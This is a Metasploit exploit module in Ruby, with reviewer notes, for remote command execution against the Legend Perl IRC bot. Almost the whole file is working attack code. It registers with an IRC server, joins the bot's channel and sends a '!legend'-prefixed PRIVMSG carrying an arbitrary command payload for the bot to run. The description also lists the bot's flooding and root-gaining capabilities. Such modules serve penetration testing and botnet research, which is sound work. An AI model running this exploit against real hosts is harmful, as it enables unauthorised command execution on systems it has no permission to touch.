##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
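# Legend Perl IRC Bot remote command execution.
#
# The module registers with the IRC server the bot sits on, joins the bot's
# channel and sends a PRIVMSG whose text starts with "!legend"; the bot runs the
# remainder of that line as a command. `check` only registers, joins and looks
# for the bot's "auth"/"logged in" greeting before quitting.
#
# Review notes on the original code:
# * `if !res =~ /353/ && !res =~ /366/` parsed as `(!res) =~ /353/`, i.e.
#   `false =~ /353/`, so the join-failure branch could never fire (and on
#   Ruby >= 3.2, where Object#=~ was removed, it raises NoMethodError). The
#   checks below match the response itself.
# * Early returns after `connect` left the socket open; `disconnect` now runs
#   from an `ensure` clause in both `check` and `exploit`.
# * NICK / CHANNEL / IRC_PASSWORD are operator-supplied and interpolated
#   verbatim into IRC lines; they are not validated against IRC syntax
#   (spaces, CR/LF), so a malformed value simply yields a malformed command.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # IRC numeric replies this module keys on (RFC 2812, section 5).
  # 463 ERR_NOPERMFORHOST / 464 ERR_PASSWDMISMATCH: registration was refused.
  REGISTRATION_REFUSED = /46[34]/.freeze
  # 353 RPL_NAMREPLY / 366 RPL_ENDOFNAMES: the JOIN was accepted.
  JOIN_ACCEPTED = /353|366/.freeze
  # Strings the bot prints to the channel when it has accepted a new operator.
  BOT_GREETING = /auth/.freeze
  BOT_LOGGED_IN = /logged in/.freeze

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Legend Perl IRC Bot Remote Code Execution',
      'Description' => %q{
        This module exploits a remote command execution on the Legend Perl IRC Bot.
        This bot has been used as a payload in the Shellshock spam last October 2014.
        This particular bot has functionalities like NMAP scanning, TCP, HTTP, SQL, and
        UDP flooding, the ability to remove system logs, and ability to gain root, and
        VNC scanning.

        Kevin Stevens, a Senior Threat Researcher at Damballa, has uploaded this script
        to VirusTotal with a md5 of 11a9f1589472efa719827079c3d13f76.
      },
      'Author' =>
        [
          'Jay Turla' # msf and initial discovery
          # MalwareMustDie
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          [ 'OSVDB', '121681' ],
          [ 'EDB', '36836' ],
          [ 'URL', 'https://www.damballa.com/perlbotnado/' ],
          [ 'URL', 'http://www.csoonline.com/article/2839054/vulnerabilities/report-criminals-use-shellshock-against-mail-servers-to-build-botnet.html' ] # Shellshock spam October 2014 details
        ],
      'Platform' => %w{ unix win },
      'Arch' => ARCH_CMD,
      'Payload' =>
        {
          # According to RFC 2812 the maximum message length is 512 bytes
          # including the trailing CR-LF; 300 leaves room for the PRIVMSG
          # prefix, the channel name and the "!legend " trigger.
          'Space' => 300,
          'DisableNops' => true,
          'Compat' =>
            {
              'PayloadType' => 'cmd'
            }
        },
      'Targets' =>
        [
          [ 'Legend IRC Bot', {} ]
        ],
      'Privileged' => false,
      'DisclosureDate' => '2015-04-27',
      'DefaultTarget' => 0))

    register_options(
      [
        Opt::RPORT(6667),
        OptString.new('IRC_PASSWORD', [false, 'IRC Connection Password', '']),
        OptString.new('NICK', [true, 'IRC Nickname', 'msf_user']),
        OptString.new('CHANNEL', [true, 'IRC Channel', '#channel'])
      ])
  end

  # The module talks to the server only after (optionally) supplying a password.
  #
  # @return [Boolean] always true
  def post_auth?
    true
  end

  # Registers with the server, joins the channel and inspects the channel
  # traffic for the bot's greeting.
  #
  # @return [Exploit::CheckCode] Unknown when registration or the JOIN fails,
  #   Vulnerable when the bot's "auth" and "logged in" strings are seen,
  #   Safe otherwise
  def check
    connect

    res = register(sock)
    if res =~ REGISTRATION_REFUSED
      vprint_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return Exploit::CheckCode::Unknown
    end

    res = join(sock)
    # Neither RPL_NAMREPLY nor RPL_ENDOFNAMES came back: the JOIN was not accepted.
    unless res =~ JOIN_ACCEPTED
      vprint_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return Exploit::CheckCode::Unknown
    end

    quit(sock)

    if res =~ BOT_GREETING && res =~ BOT_LOGGED_IN
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  ensure
    # Covers every early return above; disconnect tolerates an already-closed socket.
    disconnect
  end

  # Writes +data+ to +sock+ and drains whatever the server sends back, reading
  # in 1-second slices until a read times out or the peer closes the socket.
  #
  # @param sock [Rex::Socket::Tcp] the connected IRC socket
  # @param data [String] one or more CRLF-terminated IRC lines
  # @return [String] everything read back, possibly empty
  def send_msg(sock, data)
    sock.put(data)

    response = ''
    begin
      # get_once returns nil once the 1-second read timeout elapses with no data.
      while (chunk = sock.get_once(-1, 1))
        response << chunk
      end
    rescue ::EOFError, ::Timeout::Error, ::Errno::ETIMEDOUT => e
      # A timeout or EOF just ends the drain; keep whatever was already read.
      elog(e)
    end

    response
  end

  # Sends the PASS (if configured), NICK and USER registration lines.
  #
  # @param sock [Rex::Socket::Tcp] the connected IRC socket
  # @return [String] the server's reply as collected by #send_msg
  def register(sock)
    msg = ''

    password = datastore['IRC_PASSWORD']
    msg << "PASS #{password}\r\n" if password && !password.empty?

    # RFC 2812 limits nicknames to 9 characters; rather than let a compliant
    # server reject a longer one, substitute a random nick and tell the operator.
    nick = datastore['NICK']
    if nick.length > 9
      nick = rand_text_alpha(9)
      print_error("The nick is longer than 9 characters, using #{nick}")
    end

    msg << "NICK #{nick}\r\n"
    msg << "USER #{nick} #{Rex::Socket.source_address(rhost)} #{rhost} :#{nick}\r\n"

    send_msg(sock, msg)
  end

  # Joins the channel named by the CHANNEL option.
  #
  # @param sock [Rex::Socket::Tcp] the connected IRC socket
  # @return [String] the server's reply as collected by #send_msg
  def join(sock)
    join_msg = "JOIN #{datastore['CHANNEL']}\r\n"
    send_msg(sock, join_msg)
  end

  # Posts the encoded payload to the channel behind the bot's "!legend" trigger.
  #
  # @param sock [Rex::Socket::Tcp] the connected IRC socket
  # @return [String] the server's reply as collected by #send_msg
  def legend_command(sock)
    encoded = payload.encoded
    command_msg = "PRIVMSG #{datastore['CHANNEL']} :!legend #{encoded}\r\n"
    send_msg(sock, command_msg)
  end

  # Sends QUIT without waiting for a reply.
  #
  # @param sock [Rex::Socket::Tcp] the connected IRC socket
  # @return [void]
  def quit(sock)
    quit_msg = "QUIT :bye bye\r\n"
    sock.put(quit_msg)
  end

  # Registers, joins the channel, sends the payload and quits.
  #
  # @return [void]
  def exploit
    connect

    print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
    res = register(sock)
    if res =~ REGISTRATION_REFUSED
      print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
      return
    end

    print_status("#{rhost}:#{rport} - Joining the #{datastore['CHANNEL']} channel...")
    res = join(sock)
    # Neither RPL_NAMREPLY nor RPL_ENDOFNAMES came back: the JOIN was not accepted.
    unless res =~ JOIN_ACCEPTED
      print_error("#{rhost}:#{rport} - Error joining the #{datastore['CHANNEL']} channel")
      return
    end

    print_status("#{rhost}:#{rport} - Exploiting the malicious IRC bot...")
    legend_command(sock)

    quit(sock)
  ensure
    # Covers every early return above; disconnect tolerates an already-closed socket.
    disconnect
  end
end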